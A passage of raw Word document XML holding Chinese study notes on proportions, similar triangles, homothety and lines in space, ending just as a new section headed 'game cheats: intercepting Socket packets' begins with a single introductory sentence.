        <w:t>d,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(a±b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b=(c±d)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">d  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等比性质</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b=c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d=…=m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n(b+d+…+n≠0),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>(a+c+…+m)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(b+d+…+n)=a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">b  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平行线分线段成比例定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三条平行线截两条直线，所得的对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线段成比例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平行于三角形一边的直线截其他两边（或两边的延长线），所得的对应线段成比例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果一条直线截三角形的两边（或两边的延长线）所得的对应线段成比例，那么这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条直线平行于三角形的第三边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（5）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">相似三角形的判定: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平行于三角形一边的直线和其他两边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或两边的延长线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所构成的三角形与原三角形相似（这是相似三角形判定的引理，是以下判定方法证明的基础）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="241"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个三角形的两个角与另一个三角形的两个角对应相等,那么这两个三角形相似(简叙为两角对应相等两三角形相似)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="241"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个三角形的两条边和另一个三角形的两条边对应成比例,并且夹角相等,那么这两个三角形相似(简叙为:两边对应成比例且夹角相等,两个三角形相似)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="241"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:t>如果一个三角形的三条边与另一个三角形的三条边对应成比例,那么这两个三角形相似(简叙为:三边对应成比例,两个三角形相似)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>⑤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>斜边与一条直角边对应成比例的两直角三角形相似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>⑥</w:t>
      </w:r>
      <w:r>
        <w:t>相似三角形的传递性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-12"/>
        </w:rPr>
        <w:object w:dxaOrig="1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9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" o:ole="">
            <v:imagedata r:id="rId182" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1570345266" r:id="rId183"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-12"/>
        </w:rPr>
        <w:object w:dxaOrig="1700" w:dyaOrig="340">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:86.35pt;height:21.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" o:ole="">
            <v:imagedata r:id="rId184" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1570345267" r:id="rId185"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-12"/>
        </w:rPr>
        <w:object w:dxaOrig="1500" w:dyaOrig="340">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:79.5pt;height:21.9pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" o:ole="">
            <v:imagedata r:id="rId186" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1570345268" r:id="rId187"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>位似图形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①如果两个图形不仅是相似图形，而且每组对应点所在的直线都经过同一个点，那么这样的两个图形叫做位似图形，这个点叫做位似中心，这时的相似比又称为位似比；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②位似图形上任意一对对应点到位似中心的距离之比等于位似比。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③在平面直角坐标系中，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>位似是以原点为位似中心，相似比为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，那么位似图形对应点的坐标比等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00262A93" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>空间解析几何</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间直线方程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="0056019C" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4724400" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18" name="图片 18" descr="说明: E:\360data\重要数据\我的文档\Tencent Files\1415532825\Image\Image1\%CZCQW53%JL$]$$@PTRU0I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descr="说明: E:\360data\重要数据\我的文档\Tencent Files\1415532825\Image\Image1\%CZCQW53%JL$]$$@PTRU0I6.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724400" cy="2676525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本知识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00780E17" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这个技术难度要比原来的高很多。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
